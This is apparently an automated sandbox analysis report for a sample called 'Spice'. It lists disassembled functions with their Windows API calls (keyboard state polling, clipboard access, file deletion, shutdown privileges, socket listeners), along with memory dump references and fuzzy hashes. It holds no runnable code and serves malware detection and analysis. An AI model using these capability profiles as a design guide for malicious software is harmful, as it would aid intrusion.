Opcode ID: b15943e9f7c8c961fe1ab83a7675544ffbbc37ecc0ee8206c20d3b961d0eabd2
Instruction ID: 00d1394f2b9d3eca15db0e5497f2db9a0a82a0b1323628c9a9056678eac02b94
Opcode Fuzzy Hash: b15943e9f7c8c961fe1ab83a7675544ffbbc37ecc0ee8206c20d3b961d0eabd2
Instruction Fuzzy Hash: 27E16F71204214AFCB14DF24C991E6ABBE9FF89714F04996DF949EB2A2DB30ED01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00ED0530
GetAsyncKeyState.USER32(000000A0), ref: 00ED05B1
GetKeyState.USER32(000000A0), ref: 00ED05CC
GetAsyncKeyState.USER32(000000A1), ref: 00ED05E6
GetKeyState.USER32(000000A1), ref: 00ED05FB
GetAsyncKeyState.USER32(00000011), ref: 00ED0613
GetKeyState.USER32(00000011), ref: 00ED0625
GetAsyncKeyState.USER32(00000012), ref: 00ED063D
GetKeyState.USER32(00000012), ref: 00ED064F
GetAsyncKeyState.USER32(0000005B), ref: 00ED0667
GetKeyState.USER32(0000005B), ref: 00ED0679

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 5f7ae5ece114f417587f168c03c5888545d81189e6989b58157c64f4db30662a
Instruction ID: 21a4b4465fbbddf38716a92e21a1091574a15ead3c6981081cc1db3c160ac430
Opcode Fuzzy Hash: 5f7ae5ece114f417587f168c03c5888545d81189e6989b58157c64f4db30662a
Instruction Fuzzy Hash: C041E7306047C96DFF318A6498043B5BEA0EB51308F0C605BD9D5677C2EAA4D9D5CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00ED443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00ED4451
__swprintf.LIBCMT ref: 00ED445E

Part of subcall function 00E938C8: __woutput_l.LIBCMT ref: 00E93921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00ED4488
LoadResource.KERNEL32(?,00000000), ref: 00ED4494
LockResource.KERNEL32(00000000), ref: 00ED44A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00ED44C1
LoadResource.KERNEL32(?,00000000), ref: 00ED44D3
SizeofResource.KERNEL32(?,00000000), ref: 00ED44E2
LockResource.KERNEL32(?), ref: 00ED44EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00ED454F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 3eeba8578570dc75f4e740893442be0fcf244721ca19c08ed51e1e73ef74b568
Instruction ID: b967ac8e1b4c7c6782a25f1d07e286f6282c0f34034b815a76d7f161681fbece
Opcode Fuzzy Hash: 3eeba8578570dc75f4e740893442be0fcf244721ca19c08ed51e1e73ef74b568
Instruction Fuzzy Hash: 9431B0B150121AABDF119F60ED48EBF7BADFF04345F044426F912E2290DB34DA22DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00EE4857
EmptyClipboard.USER32 ref: 00EE485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00EE4872
CloseClipboard.USER32 ref: 00EE4911

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: af0a64bb5e2ef2ec0cfe895dec56ab2d349ffed43bd35ccb96da47b91606b2c5
Instruction ID: 113f23f8f006764472fed439dfa730ba0f60eb429d2792c43159f6cc93c960f8
Opcode Fuzzy Hash: af0a64bb5e2ef2ec0cfe895dec56ab2d349ffed43bd35ccb96da47b91606b2c5
Instruction Fuzzy Hash: B621A171201258AFDB11AF25EC09F6E77E9FF84721F008019F946AB2A1DF31AD019B94

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E90284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E82A58,?,00008000), ref: 00E902A4

Part of subcall function 00ED4FEC: GetFileAttributesW.KERNEL32(?,00ED3BFE), ref: 00ED4FED

FindFirstFileW.KERNEL32(?,?), ref: 00ED3D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00ED3E3E
MoveFileW.KERNEL32(?,?), ref: 00ED3E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00ED3E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED3E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00ED3EAC

Strings

\*.*, xrefs: 00ED3D41, 00ED3D4A, 00ED3D5F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: ef5793d83e27a307770f1fc5463797460b5ffb9125b174c4942fb2424745ae11
Instruction ID: a13814352745eedbcbfae2b5db6f3f9b2867ff98a075b064bf510511dd63a6a8
Opcode Fuzzy Hash: ef5793d83e27a307770f1fc5463797460b5ffb9125b174c4942fb2424745ae11
Instruction Fuzzy Hash: 4851857180120D9ACF15FBB0D9529EDB7B9EF10304F2011AAE849B7292DF315F0ADB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EDFA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EDFA83
FindClose.KERNEL32(00000000), ref: 00EDFB96

Part of subcall function 00E752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E752E6

Sleep.KERNEL32(0000000A), ref: 00EDFAB3
_wcscmp.LIBCMT ref: 00EDFAC7
_wcscmp.LIBCMT ref: 00EDFAE2
FindNextFileW.KERNEL32(?,?), ref: 00EDFB80

Strings

*.*, xrefs: 00EDFA68

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 29a47554fe3e1df50c5a1dfc144a975c54722d6e7ad8085361ae4e4352cae642
Instruction ID: 99490684dffc9f166aed483380e5d29e7d59cc37ae9d05749dc3ad3e2ae78afe
Opcode Fuzzy Hash: 29a47554fe3e1df50c5a1dfc144a975c54722d6e7ad8085361ae4e4352cae642
Instruction Fuzzy Hash: F2417F7190021A9FCF14EF64CC59AEEBBB8FF05354F1451A7E819B22A1EB309E45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC93E3
Part of subcall function 00EC9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC9410
Part of subcall function 00EC9399: GetLastError.KERNEL32 ref: 00EC941D

ExitWindowsEx.USER32(?,00000000), ref: 00ED57B4

Strings

SeShutdownPrivilege, xrefs: 00ED5784
@, xrefs: 00ED57A7
, xrefs: 00ED57A2

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 68c0234de4780d468b77c59e4fb93181d00b0a3591bc891bdeda7bbb5d041234
Instruction ID: f5bcf82fb4ae13180b3ccc23076b577422830f141ab9b17be38766f7d443456c
Opcode Fuzzy Hash: 68c0234de4780d468b77c59e4fb93181d00b0a3591bc891bdeda7bbb5d041234
Instruction Fuzzy Hash: 4601F233750717EAE72862A89C8AFBF7698EB04754F34212BF813F22D2EA515C028560

Uniqueness

Uniqueness Score: -1.00%

Function 00EE696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EE69C7
WSAGetLastError.WSOCK32(00000000), ref: 00EE69D6
bind.WSOCK32(00000000,?,00000010), ref: 00EE69F2
listen.WSOCK32(00000000,00000005), ref: 00EE6A01
WSAGetLastError.WSOCK32(00000000), ref: 00EE6A1B
closesocket.WSOCK32(00000000,00000000), ref: 00EE6A2F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 9d057952eec15e6ad5799bce531ec69074d5706dd9f8125601c0d618bb084fc0
Instruction ID: e7d220d6173a7a2b872bdeb7c7a891239ad6e9fc4d17a23db3cc01147620ec57
Opcode Fuzzy Hash: 9d057952eec15e6ad5799bce531ec69074d5706dd9f8125601c0d618bb084fc0
Instruction Fuzzy Hash: ED21BD71600208AFCB10EF64CD89B6EB7E9EF48724F149559E95AB73D1CB70AC019B91

Uniqueness

Uniqueness Score: -1.00%

Function 00E71663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00E71DD6
GetSysColor.USER32(0000000F), ref: 00E71E2A
SetBkColor.GDI32(?,00000000), ref: 00E71E3D

Part of subcall function 00E7166C: DefDlgProcW.USER32(?,00000020,?), ref: 00E716B4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 0bf5bcb3c3322b878179aeb3239687c94a7e536fc7c773336b6cab42635a3f4d
Instruction ID: 164e9632d4bf51e74fc9291970037f0a188645af438984a9479c0c7252085bba
Opcode Fuzzy Hash: 0bf5bcb3c3322b878179aeb3239687c94a7e536fc7c773336b6cab42635a3f4d
Instruction Fuzzy Hash: DBA18B70109309BAD73C6B6D4C48EBB359EDF4631AF24F14AF60AF9182CB20AC01E675

Uniqueness

Uniqueness Score: -1.00%

Function 00EDC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00EDC329
_wcscmp.LIBCMT ref: 00EDC359
_wcscmp.LIBCMT ref: 00EDC36E
FindNextFileW.KERNEL32(00000000,?), ref: 00EDC37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EDC3AF

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: c48c85c599e7b9ca27b7091080b844f2ed8103c844a4ac5182a6774d4bfc7a25
Instruction ID: ebad26ac5b6ae3494b20aabb83e3d5474126bd64473ea606c66c1e8f2c397609
Opcode Fuzzy Hash: c48c85c599e7b9ca27b7091080b844f2ed8103c844a4ac5182a6774d4bfc7a25
Instruction Fuzzy Hash: 6F518B756046028FC714DF68C490EAAB3E8FF49314F20965EF95AE73A1DB30AD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EE84A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EE6E89
WSAGetLastError.WSOCK32(00000000), ref: 00EE6EB2
bind.WSOCK32(00000000,?,00000010), ref: 00EE6EEB
WSAGetLastError.WSOCK32(00000000), ref: 00EE6EF8
closesocket.WSOCK32(00000000,00000000), ref: 00EE6F0C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: d34981953b0e1c31c9eba898af66678aa55e91099666c3aca78f3751fdc3e513
Instruction ID: 674c838c21ef3ffdd511428803b851aa06ef4aebad7e0920681649582a991ce5
Opcode Fuzzy Hash: d34981953b0e1c31c9eba898af66678aa55e91099666c3aca78f3751fdc3e513
Instruction Fuzzy Hash: 7441BFB5700204AFDB20AF64DC86F6E73E8AB04714F04D458FA59BB3D2DB709D008BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF59B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00EF5A02
IsWindowEnabled.USER32 ref: 00EF5A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00EF5A1D
IsIconic.USER32 ref: 00EF5A2B
IsZoomed.USER32 ref: 00EF5A39

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: ad3f05a77177268a5bf839bab5b65ed048f38bd74f2328f24ec8c24677f7017c
Instruction ID: 28297b359a4e7a5e27ce2cf6cfa4522c88f9e3c43df28ba42ad49ee7911da148
Opcode Fuzzy Hash: ad3f05a77177268a5bf839bab5b65ed048f38bd74f2328f24ec8c24677f7017c
Instruction Fuzzy Hash: 2711E2723009199FE7211F268C84B3A7B99FF94720F04A129EB49E7241CB70DD018AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EEC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00EB027A,?), ref: 00EEC6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EEC6F9

Strings

kernel32.dll, xrefs: 00EEC6E2
GetSystemWow64DirectoryW, xrefs: 00EEC6F3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 490bd33e2c5c755416d1164f282d22b2fa04e84e67ebb64fc6d9beaff87094d6
Instruction ID: b11045f215cfccf0a528e7aa1ede340646113af5ede38b547f1cb0a31f166aad
Opcode Fuzzy Hash: 490bd33e2c5c755416d1164f282d22b2fa04e84e67ebb64fc6d9beaff87094d6
Instruction Fuzzy Hash: CAE0C2381107568FD7204B3ACC4AB4277D4FF08308F60942BEC85E2250DB70D840DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00EB0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00EB0034
__swprintf.LIBCMT ref: 00EB0065

Strings

WIN_XPe, xrefs: 00EB00A4
%.3d, xrefs: 00EB003F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 175bc587691c367ee48ad7acb014f4e09552d12b848f2e84983efed636834960
Instruction ID: 4833ca145feb53b284ddba6158253c56d9d8df1e5117a12e99ccdce2fa34b7e2
Opcode Fuzzy Hash: 175bc587691c367ee48ad7acb014f4e09552d12b848f2e84983efed636834960
Instruction Fuzzy Hash: 89D01271808118EACB18AA90C844EFB737CFB04300F546852F946B2080D635A788AB22

Uniqueness

Uniqueness Score: -1.00%

Function 00EE29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00EE2AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EE2AE4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 8b51e7c71bf8653a016d8dd5dd5ba50b76a8c99ecb5c2ce7cb1f4f9c8be2f446
Instruction ID: ea3d087e0f00e66dc24f18cef78c383f03e86e74b103d3479d1f771f6c89bad7
Opcode Fuzzy Hash: 8b51e7c71bf8653a016d8dd5dd5ba50b76a8c99ecb5c2ce7cb1f4f9c8be2f446
Instruction Fuzzy Hash: 0F41D271A0024DBFEB20DE96DC81EBBB7ECEB40718F10506EF709B6141EA719E419A60

Uniqueness

Uniqueness Score: -1.00%

Function 00ED42D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00ED42FF
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00ED433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00ED4345

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: e8e529527a3df20e6df1a4aa6271e93b909713ef0674ab0b1fbc36b7d86650c4
Instruction ID: 2b5d1c9f9450ca640d488efbb1d2e08372be919d1f3905f3cb69af2c6378f5a9
Opcode Fuzzy Hash: e8e529527a3df20e6df1a4aa6271e93b909713ef0674ab0b1fbc36b7d86650c4
Instruction Fuzzy Hash: 141182B1900229BFEB109BECDC44FAFB7BCEB08710F100156B914F7290C6745D0187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00ED4F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00ED4F5C
FreeSid.ADVAPI32(?), ref: 00ED4F6C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: e54856831241b7c40b81b8ab2dcce4ac6932dcd9e4930ad1fb986bb40b016e0a
Instruction ID: 2cc4717426c2f8db4f761c0904190c0f708d79f74bb5789d2a9bf8f6b9d7bdd9
